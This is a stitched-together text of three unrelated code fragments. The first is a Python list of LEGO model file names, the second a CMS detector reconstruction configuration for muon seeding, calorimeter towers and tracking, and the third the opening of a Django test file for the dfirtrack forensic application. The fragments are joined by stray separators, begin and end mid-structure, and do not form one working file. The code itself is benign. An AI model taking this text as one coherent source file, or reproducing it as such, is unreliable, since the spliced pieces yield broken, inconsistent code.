'1952-1 - Dairy Tanker.mpd:1952 - car.ldr',
'1952-1 - Dairy Tanker.mpd:1952 - trailer.ldr',
'1969-1 - Mini Robot.mpd:1969 - robot.ldr',
'1974-4 - Star Quest.mpd:1974 - vehicle.ldr',
#===================== FINISHED HERE =====================
#3/8/2021 below here
'20006-1 - Clone Turbo Tank - Mini.mpd',
'20009-1 - AT-TE Walker - Mini.mpd',
'20011-1 - Garbage Truck.mpd',
'20014-1 - 4 x 4 Dynamo.mpd',
'20019-1 - Slave I.mpd',
'20021-1 - Bounty Hunter Gunship - Mini.mpd',
'2140-1 - ANWB Roadside Assistance Crew.mpd:2140 - car 1.ldr',
'2140-1 - ANWB Roadside Assistance Crew.mpd:2140 - car 2.ldr',
'2140-1 - ANWB Roadside Assistance Crew.mpd:2140 - car 3.ldr',
'2148-1 - LEGO Truck.mpd:2148 - truck.ldr',
'2149-1 - Color Line Container Lorry.mpd:2149 - truck.ldr',
'2149-1 - Color Line Container Lorry.mpd:2149 - trailer.ldr',
'2149-1 - Color Line Container Lorry.mpd:2149 - container.ldr' # not a vhc
'2150-1 - Train Station.mpd:2150 - luggage car 1.ldr',
'2150-1 - Train Station.mpd:2150 - luggage car 2.ldr',
'2531-1 - Rescue Helicopter and Jeep.mpd:2531 - car.ldr',
'2531-1 - Rescue Helicopter and Jeep.mpd:2531 - helicopter.ldr',
'2541-1 - Adventurers Car.mpd:2541 - car.ldr',
'2542-1 - Adventurers Aeroplane.mpd:2542 - aeroplane.ldr',
# from tiny turbos 3
'30030-1 - Racing Car.mpd',
'30033-1 - Racing Truck.mpd',
'30034-1 - Racing Tow Truck.mpd',
'30035-1 - Racing Car.mpd',
'30036-1 - Buggy Racer.mpd',
# scanning again
'30050-1 - Republic Attack Shuttle - Mini.mpd',
'30051-1 - X-wing Fighter - Mini.mpd',
'30052-1 - AAT - Mini.mpd',
'30053-1 - Republic Attack Cruiser - Mini.mpd',
'30054-1 - AT-ST - Mini.mpd',
'30055-1 - Vulture Droid - Mini.mpd',
'30056 - Star Destroyer.mpd',
'30090-1 - Desert Glider.mpd', # contains minifig
'30091-1 - Desert Rover.mpd', # contains minifig
'3015-1 - Space Police Car.mpd:3015 - spaceship.ldr',
'30161-1 - Batmobile.mpd',
'30181-1 - Helicopter.ldr',
'30190 - Ferrari 150deg Italia.mpd',
'30191-1 - Scuderia Ferrari Truck.mpd',
'30192-1 - Ferrari F40.mpd',
#'30193-1 - 250 GT Berlinetta.mpd', # incomplete
'30194-1 - 458 Italia.mpd',
'30195-1 - FXX.mpd',
'30277 - First Order Star Destroyer.mpd',
#'30283-1 - Off-Road.mpd', # incomplete
'30284-1 - Tractor.mpd',
'30300-1 - The Batman Tumbler.mpd',
'30311-1 - Swamp Police Helicopter.mpd:30311 - helicopter.ldr',
'30312-1 - Demolition Driller.mpd:30312 - driller.ldr',
'30313-1 - Garbage Truck.mpd:30313 - truck.ldr',
'3056-1 - Go-Kart.mpd', # contains minifig
'30572 - Race Car.mpd',
'3063-1 - Heartlake Flying Club.mpd:3063 - plane.ldr' # contains friends mfg
# STOPPED HERE
# tiny turbos continues here
'4096 - Micro Wheels - AB Forklift.mpd',
'4096 - Micro Wheels - AB Loader.mpd',
'4096 - Micro Wheels - AB Truck and Trailer.mpd',
'4096 - Micro Wheels - EB Combine Harvester.mpd',
'4096 - Micro Wheels - EB Crane.mpd',
'4096 - Micro Wheels - | |
rParam = cms.double(0.4),
radiusPU = cms.double(0.5),
src = cms.InputTag("caloTowerForTrk"),
srcPVs = cms.InputTag("firstStepPrimaryVerticesUnsorted"),
useDeterministicSeed = cms.bool(True),
voronoiRfact = cms.double(-0.9)
)
# Standalone-muon seed generator. The CSC_*/DT_*/OL_*/SMB_*/SME_* vdoubles
# are tuned parameterisation coefficients per chamber/station pair, and the
# matching *_scale entries are their error scalings (generated constants —
# do not hand-edit).
ancientMuonSeed = cms.EDProducer("MuonSeedGenerator",
    CSCRecSegmentLabel = cms.InputTag("cscSegments"),
    # CSC station-pair parameterisations
    CSC_01 = cms.vdouble(
        0.166, 0.0, 0.0, 0.031, 0.0,
        0.0
    ),
    CSC_01_1_scale = cms.vdouble(-1.915329, 0.0),
    CSC_02 = cms.vdouble(
        0.612, -0.207, -0.0, 0.067, -0.001,
        0.0
    ),
    CSC_03 = cms.vdouble(
        0.787, -0.338, 0.029, 0.101, -0.008,
        0.0
    ),
    CSC_12 = cms.vdouble(
        -0.161, 0.254, -0.047, 0.042, -0.007,
        0.0
    ),
    CSC_12_1_scale = cms.vdouble(-6.434242, 0.0),
    CSC_12_2_scale = cms.vdouble(-1.63622, 0.0),
    CSC_12_3_scale = cms.vdouble(-1.63622, 0.0),
    CSC_13 = cms.vdouble(
        0.901, -1.302, 0.533, 0.045, 0.005,
        0.0
    ),
    CSC_13_2_scale = cms.vdouble(-6.077936, 0.0),
    CSC_13_3_scale = cms.vdouble(-1.701268, 0.0),
    CSC_14 = cms.vdouble(
        0.606, -0.181, -0.002, 0.111, -0.003,
        0.0
    ),
    CSC_14_3_scale = cms.vdouble(-1.969563, 0.0),
    CSC_23 = cms.vdouble(
        -0.081, 0.113, -0.029, 0.015, 0.008,
        0.0
    ),
    CSC_23_1_scale = cms.vdouble(-19.084285, 0.0),
    CSC_23_2_scale = cms.vdouble(-6.079917, 0.0),
    CSC_24 = cms.vdouble(
        0.004, 0.021, -0.002, 0.053, 0.0,
        0.0
    ),
    CSC_24_1_scale = cms.vdouble(-6.055701, 0.0),
    CSC_34 = cms.vdouble(
        0.062, -0.067, 0.019, 0.021, 0.003,
        0.0
    ),
    CSC_34_1_scale = cms.vdouble(-11.520507, 0.0),
    DTRecSegmentLabel = cms.InputTag("dt4DSegments"),
    # DT station-pair parameterisations
    DT_12 = cms.vdouble(
        0.183, 0.054, -0.087, 0.028, 0.002,
        0.0
    ),
    DT_12_1_scale = cms.vdouble(-3.692398, 0.0),
    DT_12_2_scale = cms.vdouble(-3.518165, 0.0),
    DT_13 = cms.vdouble(
        0.315, 0.068, -0.127, 0.051, -0.002,
        0.0
    ),
    DT_13_1_scale = cms.vdouble(-4.520923, 0.0),
    DT_13_2_scale = cms.vdouble(-4.257687, 0.0),
    DT_14 = cms.vdouble(
        0.359, 0.052, -0.107, 0.072, -0.004,
        0.0
    ),
    DT_14_1_scale = cms.vdouble(-5.644816, 0.0),
    DT_14_2_scale = cms.vdouble(-4.808546, 0.0),
    DT_23 = cms.vdouble(
        0.13, 0.023, -0.057, 0.028, 0.004,
        0.0
    ),
    DT_23_1_scale = cms.vdouble(-5.320346, 0.0),
    DT_23_2_scale = cms.vdouble(-5.117625, 0.0),
    DT_24 = cms.vdouble(
        0.176, 0.014, -0.051, 0.051, 0.003,
        0.0
    ),
    DT_24_1_scale = cms.vdouble(-7.490909, 0.0),
    DT_24_2_scale = cms.vdouble(-6.63094, 0.0),
    DT_34 = cms.vdouble(
        0.044, 0.004, -0.013, 0.029, 0.003,
        0.0
    ),
    DT_34_1_scale = cms.vdouble(-13.783765, 0.0),
    DT_34_2_scale = cms.vdouble(-11.901897, 0.0),
    # Which subdetector measurements participate in seeding
    EnableCSCMeasurement = cms.bool(True),
    EnableDTMeasurement = cms.bool(True),
    EnableME0Measurement = cms.bool(True),
    ME0RecSegmentLabel = cms.InputTag("me0Segments"),
    # Overlap (DT/CSC) region parameterisations
    OL_1213 = cms.vdouble(
        0.96, -0.737, 0.0, 0.052, 0.0,
        0.0
    ),
    OL_1213_0_scale = cms.vdouble(-4.488158, 0.0),
    OL_1222 = cms.vdouble(
        0.848, -0.591, 0.0, 0.062, 0.0,
        0.0
    ),
    OL_1222_0_scale = cms.vdouble(-5.810449, 0.0),
    OL_1232 = cms.vdouble(
        0.184, 0.0, 0.0, 0.066, 0.0,
        0.0
    ),
    OL_1232_0_scale = cms.vdouble(-5.964634, 0.0),
    OL_2213 = cms.vdouble(
        0.117, 0.0, 0.0, 0.044, 0.0,
        0.0
    ),
    OL_2213_0_scale = cms.vdouble(-7.239789, 0.0),
    OL_2222 = cms.vdouble(
        0.107, 0.0, 0.0, 0.04, 0.0,
        0.0
    ),
    OL_2222_0_scale = cms.vdouble(-7.667231, 0.0),
    # Single-segment barrel (SMB) parameterisations
    SMB_10 = cms.vdouble(
        1.387, -0.038, 0.0, 0.19, 0.0,
        0.0
    ),
    SMB_10_0_scale = cms.vdouble(2.448566, 0.0),
    SMB_11 = cms.vdouble(
        1.247, 0.72, -0.802, 0.229, -0.075,
        0.0
    ),
    SMB_11_0_scale = cms.vdouble(2.56363, 0.0),
    SMB_12 = cms.vdouble(
        2.128, -0.956, 0.0, 0.199, 0.0,
        0.0
    ),
    SMB_12_0_scale = cms.vdouble(2.283221, 0.0),
    SMB_20 = cms.vdouble(
        1.011, -0.052, 0.0, 0.188, 0.0,
        0.0
    ),
    SMB_20_0_scale = cms.vdouble(1.486168, 0.0),
    SMB_21 = cms.vdouble(
        1.043, -0.124, 0.0, 0.183, 0.0,
        0.0
    ),
    SMB_21_0_scale = cms.vdouble(1.58384, 0.0),
    SMB_22 = cms.vdouble(
        1.474, -0.758, 0.0, 0.185, 0.0,
        0.0
    ),
    SMB_22_0_scale = cms.vdouble(1.346681, 0.0),
    SMB_30 = cms.vdouble(
        0.505, -0.022, 0.0, 0.215, 0.0,
        0.0
    ),
    SMB_30_0_scale = cms.vdouble(-3.629838, 0.0),
    SMB_31 = cms.vdouble(
        0.549, -0.145, 0.0, 0.207, 0.0,
        0.0
    ),
    SMB_31_0_scale = cms.vdouble(-3.323768, 0.0),
    SMB_32 = cms.vdouble(
        0.67, -0.327, 0.0, 0.22, 0.0,
        0.0
    ),
    SMB_32_0_scale = cms.vdouble(-3.054156, 0.0),
    # Single-segment endcap (SME) parameterisations
    SME_11 = cms.vdouble(
        3.295, -1.527, 0.112, 0.378, 0.02,
        0.0
    ),
    SME_11_0_scale = cms.vdouble(1.325085, 0.0),
    SME_12 = cms.vdouble(
        0.102, 0.599, 0.0, 0.38, 0.0,
        0.0
    ),
    SME_12_0_scale = cms.vdouble(2.279181, 0.0),
    SME_13 = cms.vdouble(
        -1.286, 1.711, 0.0, 0.356, 0.0,
        0.0
    ),
    SME_13_0_scale = cms.vdouble(0.104905, 0.0),
    SME_21 = cms.vdouble(
        -0.529, 1.194, -0.358, 0.472, 0.086,
        0.0
    ),
    SME_21_0_scale = cms.vdouble(-0.040862, 0.0),
    SME_22 = cms.vdouble(
        -1.207, 1.491, -0.251, 0.189, 0.243,
        0.0
    ),
    SME_22_0_scale = cms.vdouble(-3.457901, 0.0),
    SME_31 = cms.vdouble(
        -1.594, 1.482, -0.317, 0.487, 0.097,
        0.0
    ),
    SME_32 = cms.vdouble(
        -0.901, 1.333, -0.47, 0.41, 0.073,
        0.0
    ),
    SME_41 = cms.vdouble(
        -0.003, 0.005, 0.005, 0.608, 0.076,
        0.0
    ),
    SME_42 = cms.vdouble(
        -0.003, 0.005, 0.005, 0.608, 0.076,
        0.0
    ),
    beamSpotTag = cms.InputTag("offlineBeamSpot"),
    # Search-window settings around detector cracks and in eta/phi
    crackEtas = cms.vdouble(0.2, 1.6, 1.7),
    crackWindow = cms.double(0.04),
    deltaEtaCrackSearchWindow = cms.double(0.25),
    deltaEtaSearchWindow = cms.double(0.2),
    deltaPhiSearchWindow = cms.double(0.25),
    scaleDT = cms.bool(True)
)
# caloTowerForTrk: "CaloTowersCreator" producer that builds calorimeter towers
# from ECAL (EB/EE), HCAL barrel/endcap (hbhereco), forward (hfreco) and outer
# (horeco) rec hits -- see the input collections at the bottom of this PSet.
# Everything else is per-subdetector energy thresholds, weights and
# severity-level settings for rec-hit selection.
# NOTE(review): this looks like an auto-generated (dumped) configuration;
# do not hand-tune individual values here.
caloTowerForTrk = cms.EDProducer("CaloTowersCreator",
    AllowMissingInputs = cms.bool(False),
    # ECAL barrel (EB) / endcap (EE) thresholds (GeV) and weights
    EBGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    EBSumThreshold = cms.double(0.2),
    EBThreshold = cms.double(0.07),
    EBWeight = cms.double(1.0),
    EBWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    EEGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    EESumThreshold = cms.double(0.45),
    EEThreshold = cms.double(0.3),
    EEWeight = cms.double(1.0),
    EEWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    # ECAL rec hits flagged with these severities are excluded from towers
    EcalRecHitSeveritiesToBeExcluded = cms.vstring(
        'kTime',
        'kWeird',
        'kBad'
    ),
    EcalSeveritiesToBeUsedInBadTowers = cms.vstring(),
    EcutTower = cms.double(-1000.0),
    # HCAL barrel (HB), endcap depths (HED/HES), forward (HF1/HF2) and
    # outer (HO) thresholds and weights
    HBGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    HBThreshold = cms.double(0.3),
    HBThreshold1 = cms.double(0.1),
    HBThreshold2 = cms.double(0.2),
    HBWeight = cms.double(1.0),
    HBWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    HEDGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    HEDThreshold = cms.double(0.2),
    HEDThreshold1 = cms.double(0.1),
    HEDWeight = cms.double(1.0),
    HEDWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    HESGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    HESThreshold = cms.double(0.2),
    HESThreshold1 = cms.double(0.1),
    HESWeight = cms.double(1.0),
    HESWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    HF1Grid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    HF1Threshold = cms.double(0.5),
    HF1Weight = cms.double(1.0),
    HF1Weights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    HF2Grid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    HF2Threshold = cms.double(0.85),
    HF2Weight = cms.double(1.0),
    HF2Weights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    HOGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
    # HO thresholds are per-ring (ring 0, +-1, +-2)
    HOThreshold0 = cms.double(1.1),
    HOThresholdMinus1 = cms.double(3.5),
    HOThresholdMinus2 = cms.double(3.5),
    HOThresholdPlus1 = cms.double(3.5),
    HOThresholdPlus2 = cms.double(3.5),
    HOWeight = cms.double(1.0),
    HOWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
    HcalAcceptSeverityLevel = cms.uint32(9),
    HcalAcceptSeverityLevelForRejectedHit = cms.uint32(9999),
    HcalPhase = cms.int32(1),
    HcalThreshold = cms.double(-1000.0),
    MomConstrMethod = cms.int32(1),
    # depths (fractions) at which the tower momentum direction is evaluated
    MomEBDepth = cms.double(0.3),
    MomEEDepth = cms.double(0.0),
    MomHBDepth = cms.double(0.2),
    MomHEDepth = cms.double(0.4),
    UseEcalRecoveredHits = cms.bool(False),
    UseEtEBTreshold = cms.bool(False),
    UseEtEETreshold = cms.bool(False),
    UseHO = cms.bool(True),
    UseHcalRecoveredHits = cms.bool(True),
    UseRejectedHitsOnly = cms.bool(False),
    UseRejectedRecoveredEcalHits = cms.bool(False),
    UseRejectedRecoveredHcalHits = cms.bool(True),
    UseSymEBTreshold = cms.bool(True),
    UseSymEETreshold = cms.bool(True),
    # input rec-hit collections
    ecalInputs = cms.VInputTag(cms.InputTag("ecalRecHit","EcalRecHitsEB"), cms.InputTag("ecalRecHit","EcalRecHitsEE")),
    hbheInput = cms.InputTag("hbhereco"),
    hfInput = cms.InputTag("hfreco"),
    hoInput = cms.InputTag("horeco"),
    missingHcalRescaleFactorForEcal = cms.double(0)
)
# detachedQuadStep: "TrackListMerger" combining the two quality-selected legs
# of the detachedQuadStep iteration.  The same track collection
# ("detachedQuadStepTracks") is listed twice because it is paired with two
# different selector outputs (the "Vtx" and "Trk" legs of
# detachedQuadStepSelector); only track-quality values are written out
# (writeOnlyTrkQuals = True).
detachedQuadStep = cms.EDProducer("TrackListMerger",
    Epsilon = cms.double(-0.001),
    FoundHitBonus = cms.double(5.0),
    LostHitPenalty = cms.double(5.0),
    MaxNormalizedChisq = cms.double(1000.0),
    MinFound = cms.int32(3),
    MinPT = cms.double(0.05),
    ShareFrac = cms.double(0.19),
    # one entry per selector output below (indices must line up)
    TrackProducers = cms.VInputTag(cms.InputTag("detachedQuadStepTracks"), cms.InputTag("detachedQuadStepTracks")),
    allowFirstHitShare = cms.bool(True),
    copyExtras = cms.untracked.bool(False),
    copyMVA = cms.bool(True),
    hasSelector = cms.vint32(1, 1),
    indivShareFrac = cms.vdouble(0.09, 0.09),
    newQuality = cms.string('confirmed'),
    selectedTrackQuals = cms.VInputTag(cms.InputTag("detachedQuadStepSelector","detachedQuadStepVtx"), cms.InputTag("detachedQuadStepSelector","detachedQuadStepTrk")),
    setsToMerge = cms.VPSet(cms.PSet(
        pQual = cms.bool(True),
        tLists = cms.vint32(0, 1)
    )),
    shareFrac = cms.double(0.09),
    trackAlgoPriorityOrder = cms.string('trackAlgoPriorityOrder'),
    writeOnlyTrkQuals = cms.bool(True)
)
# detachedQuadStepClusters: "TrackClusterRemoverPhase2" -- masks pixel and
# Phase-2 outer-tracker clusters already used by 'highPurity' tracks of the
# previous iteration (lowPtTripletStep), so this iteration seeds only on the
# remaining clusters.
detachedQuadStepClusters = cms.EDProducer("TrackClusterRemoverPhase2",
    TrackQuality = cms.string('highPurity'),
    maxChi2 = cms.double(9.0),
    minNumberOfLayersWithMeasBeforeFiltering = cms.int32(0),
    # chain the masks: start from the previous step's removal info
    oldClusterRemovalInfo = cms.InputTag("lowPtTripletStepClusters"),
    overrideTrkQuals = cms.InputTag("lowPtTripletStepSelector","lowPtTripletStep"),
    phase2OTClusters = cms.InputTag("siPhase2Clusters"),
    phase2pixelClusters = cms.InputTag("siPixelClusters"),
    trackClassifier = cms.InputTag("","QualityMasks"),
    trajectories = cms.InputTag("lowPtTripletStepTracks")
)
# detachedQuadStepHitDoublets: "HitPairEDProducer" -- builds hit pairs from
# the detachedQuadStep seeding layers inside the configured tracking regions.
# It emits intermediate doublets for the CA quadruplet finder downstream
# (produceIntermediateHitDoublets = True) rather than final seeding hit sets.
detachedQuadStepHitDoublets = cms.EDProducer("HitPairEDProducer",
    clusterCheck = cms.InputTag("trackerClusterCheck"),
    layerPairs = cms.vuint32(0, 1, 2),
    maxElement = cms.uint32(50000000),
    maxElementTotal = cms.uint32(50000000),
    produceIntermediateHitDoublets = cms.bool(True),
    produceSeedingHitSets = cms.bool(False),
    seedingLayers = cms.InputTag("detachedQuadStepSeedLayers"),
    trackingRegions = cms.InputTag("detachedQuadStepTrackingRegions"),
    trackingRegionsSeedingLayers = cms.InputTag("")
)
# detachedQuadStepHitQuadruplets: "CAHitQuadrupletEDProducer" -- cellular-
# automaton quadruplet finder running on the doublets produced above.
detachedQuadStepHitQuadruplets = cms.EDProducer("CAHitQuadrupletEDProducer",
    CAHardPtCut = cms.double(0),
    CAPhiCut = cms.double(0),
    CAThetaCut = cms.double(0.0011),
    SeedComparitorPSet = cms.PSet(
        ComponentName = cms.string('none')
    ),
    doublets = cms.InputTag("detachedQuadStepHitDoublets"),
    extraHitRPhitolerance = cms.double(0),
    fitFastCircle = cms.bool(True),
    fitFastCircleChi2Cut = cms.bool(True),
    # pt-dependent chi2 cut: value1 at pt1 (0.8) down to value2 at pt2 (2)
    maxChi2 = cms.PSet(
        enabled = cms.bool(True),
        pt1 = cms.double(0.8),
        pt2 = cms.double(2),
        value1 = cms.double(500),
        value2 = cms.double(100)
    ),
    mightGet = cms.untracked.vstring('IntermediateHitDoublets_detachedQuadStepHitDoublets__RECO'),
    useBendingCorrection = cms.bool(True)
)
# detachedQuadStepSeedLayers: "SeedingLayersEDProducer" -- declares the layer
# combinations used for quadruplet seeding.  layerList is pixel-only (barrel
# BPix1-4 plus forward disks up to FPix8 -- consistent with a Phase-2 pixel
# detector); clusters masked by detachedQuadStepClusters are skipped.
detachedQuadStepSeedLayers = cms.EDProducer("SeedingLayersEDProducer",
    BPix = cms.PSet(
        HitProducer = cms.string('siPixelRecHits'),
        TTRHBuilder = cms.string('WithTrackAngle'),
        skipClusters = cms.InputTag("detachedQuadStepClusters")
    ),
    FPix = cms.PSet(
        HitProducer = cms.string('siPixelRecHits'),
        TTRHBuilder = cms.string('WithTrackAngle'),
        skipClusters = cms.InputTag("detachedQuadStepClusters")
    ),
    # strip / outer-tracker layer PSets left empty: layerList below uses
    # pixel layers only
    MTEC = cms.PSet(
    ),
    MTIB = cms.PSet(
    ),
    MTID = cms.PSet(
    ),
    MTOB = cms.PSet(
    ),
    TEC = cms.PSet(
    ),
    TIB = cms.PSet(
    ),
    TID = cms.PSet(
    ),
    TOB = cms.PSet(
    ),
    layerList = cms.vstring(
        'BPix1+BPix2+BPix3+BPix4',
        'BPix1+BPix2+BPix3+FPix1_pos',
        'BPix1+BPix2+BPix3+FPix1_neg',
        'BPix1+BPix2+FPix1_pos+FPix2_pos',
        'BPix1+BPix2+FPix1_neg+FPix2_neg',
        'BPix1+FPix1_pos+FPix2_pos+FPix3_pos',
        'BPix1+FPix1_neg+FPix2_neg+FPix3_neg',
        'FPix1_pos+FPix2_pos+FPix3_pos+FPix4_pos',
        'FPix1_neg+FPix2_neg+FPix3_neg+FPix4_neg',
        'FPix2_pos+FPix3_pos+FPix4_pos+FPix5_pos',
        'FPix2_neg+FPix3_neg+FPix4_neg+FPix5_neg',
        'FPix3_pos+FPix4_pos+FPix5_pos+FPix6_pos',
        'FPix3_neg+FPix4_neg+FPix5_neg+FPix6_neg',
        'FPix4_pos+FPix5_pos+FPix6_pos+FPix7_pos',
        'FPix4_neg+FPix5_neg+FPix6_neg+FPix7_neg',
        'FPix5_pos+FPix6_pos+FPix7_pos+FPix8_pos',
        'FPix5_neg+FPix6_neg+FPix7_neg+FPix8_neg'
    )
)
# detachedQuadStepSeeds: seed creator turning the CA quadruplets into track
# seeds, applying a pixel cluster-shape filter (FilterPixelHits = True).
detachedQuadStepSeeds = cms.EDProducer("SeedCreatorFromRegionConsecutiveHitsTripletOnlyEDProducer",
    MinOneOverPtError = cms.double(1),
    OriginTransverseErrorMultiplier = cms.double(1),
    SeedComparitorPSet = cms.PSet(
        ClusterShapeCacheSrc = cms.InputTag("siPixelClusterShapeCache"),
        ClusterShapeHitFilterName = cms.string('ClusterShapeHitFilter'),
        ComponentName = cms.string('PixelClusterShapeSeedComparitor'),
        FilterAtHelixStage = cms.bool(False),
        FilterPixelHits = cms.bool(True),
        FilterStripHits = cms.bool(False)
    ),
    # seed momentum used when the magnetic field is off (B=0)
    SeedMomentumForBOFF = cms.double(5),
    TTRHBuilder = cms.string('WithTrackAngle'),
    forceKinematicWithRegionDirection = cms.bool(False),
    magneticField = cms.string(''),
    mightGet = cms.untracked.vstring('RegionsSeedingHitSets_detachedQuadStepHitQuadruplets__RECO'),
    propagator = cms.string('PropagatorWithMaterial'),
    seedingHitSets = cms.InputTag("detachedQuadStepHitQuadruplets")
)
detachedQuadStepSelector = cms.EDProducer("MultiTrackSelector",
beamspot = cms.InputTag("offlineBeamSpot"),
src = cms.InputTag("detachedQuadStepTracks"),
trackSelectors = cms.VPSet(
cms.PSet(
applyAbsCutsIfNoPV = cms.bool(False),
applyAdaptedPVCuts | |
# dfirtrack_main/tests/system/test_system_views.py
import urllib.parse
from django.contrib.auth.models import User
from django.contrib.messages import get_messages
from django.test import TestCase
from dfirtrack.settings import INSTALLED_APPS as installed_apps
from dfirtrack_artifacts.models import (
Artifact,
Artifactpriority,
Artifactstatus,
Artifacttype,
)
from dfirtrack_config.models import MainConfigModel, Workflow
from dfirtrack_main.models import (
Ip,
System,
Systemstatus,
Task,
Taskname,
Taskpriority,
Taskstatus,
)
class SystemViewTestCase(TestCase):
"""system view tests"""
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(
username='testuser_system', password='<PASSWORD>'
)
# create object
systemstatus_1 = Systemstatus.objects.create(systemstatus_name='systemstatus_1')
# create objects
system_1 = System.objects.create(
system_name='system_1',
systemstatus=systemstatus_1,
system_created_by_user_id=test_user,
system_modified_by_user_id=test_user,
)
system_2 = System.objects.create(
system_name='system_2',
systemstatus=systemstatus_1,
system_created_by_user_id=test_user,
system_modified_by_user_id=test_user,
)
# create object
Workflow.objects.create(
workflow_name='workflow_1',
workflow_created_by_user_id=test_user,
workflow_modified_by_user_id=test_user,
)
# create object
artifactpriority_1 = Artifactpriority.objects.create(
artifactpriority_name='artifactpriority_1'
)
# create objects
artifactstatus_open = Artifactstatus.objects.create(
artifactstatus_name='artifactstatus_open'
)
artifactstatus_closed = Artifactstatus.objects.create(
artifactstatus_name='artifactstatus_closed'
)
# create object
artifacttype_1 = Artifacttype.objects.create(artifacttype_name='artifacttype_1')
# create objects
Artifact.objects.create(
artifact_name='artifact_open_system_1',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_open,
artifacttype=artifacttype_1,
system=system_1,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
Artifact.objects.create(
artifact_name='artifact_closed_system_1',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_closed,
artifacttype=artifacttype_1,
system=system_1,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
Artifact.objects.create(
artifact_name='artifact_open_system_2',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_open,
artifacttype=artifacttype_1,
system=system_2,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
Artifact.objects.create(
artifact_name='artifact_closed_system_2',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_closed,
artifacttype=artifacttype_1,
system=system_2,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
# get config
main_config_model = MainConfigModel.objects.get(main_config_name='MainConfig')
main_config_model.artifactstatus_open.add(artifactstatus_open)
# create objects
taskname_00_blocked_system_1 = Taskname.objects.create(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.create(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.create(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.create(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.create(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.create(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.create(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.create(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.create(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.create(
taskname_name='task_40_skipped_system_2'
)
taskpriority_1 = Taskpriority.objects.create(taskpriority_name='taskpriority_1')
# get objects
taskstatus_00_blocked = Taskstatus.objects.get(taskstatus_name='00_blocked')
taskstatus_10_pending = Taskstatus.objects.get(taskstatus_name='10_pending')
taskstatus_20_working = Taskstatus.objects.get(taskstatus_name='20_working')
taskstatus_30_done = Taskstatus.objects.get(taskstatus_name='30_done')
taskstatus_40_skipped = Taskstatus.objects.get(taskstatus_name='40_skipped')
# create objects
Task.objects.create(
taskname=taskname_00_blocked_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_00_blocked,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_10_pending_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_10_pending,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_20_working_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_20_working,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_30_done_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_30_done,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_40_skipped_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_40_skipped,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_00_blocked_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_00_blocked,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_10_pending_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_10_pending,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_20_working_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_20_working,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_30_done_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_30_done,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_40_skipped_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_40_skipped,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
def test_system_list_not_logged_in(self):
"""test list view"""
# create url
destination = '/login/?next=' + urllib.parse.quote('/system/', safe='')
# get response
response = self.client.get('/system/', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=302, target_status_code=200
)
def test_system_list_logged_in(self):
"""test list view"""
# login testuser
